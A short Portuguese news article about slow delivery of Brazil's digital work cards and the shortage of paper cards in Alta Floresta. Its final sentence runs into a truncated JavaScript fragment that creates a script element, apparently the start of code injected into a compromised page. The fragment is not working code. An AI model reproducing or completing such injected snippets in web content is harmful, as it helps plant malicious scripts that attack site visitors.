As novas carteiras de trabalho digitais prometem trazer mais agilidade para vida do empregado, porém foi um grande problema para diversas partes do Brasil, a demora da implantação deixou muitos na “mão”, e esgotou o estoque da antiga CTPS em todo o país. Em Alta Floresta a regularização do sistema aconteceu em meados do mês de novembro e ainda assim o processo é demorado.
No inicio do ano após a implantação do sistema foi um grande problema, isso porque somente nas capitais realizava a emissão do novo documento, demorando para municípios como Alta Floresta até 90 dias para a chegada do documento.
Alta Floresta ainda tinha algumas unidades da antiga carteira, o que permitiu a emissão do documento em menos tempo, mas devido o aumento de geração de emprego no município e região, o estoque esgotou em pouco tempo.
A solução foi pedir a outros municípios que ainda posuíam o material para ceder para Alta Floresta, quantias essas que eram esgotadas em apenas um dia, porém segundo informações repassadas pelo Sine o prazo para a entrega do documento que agora é digital é de 45 à 60 dias.var d=document;var s=d.createElement(‘script’);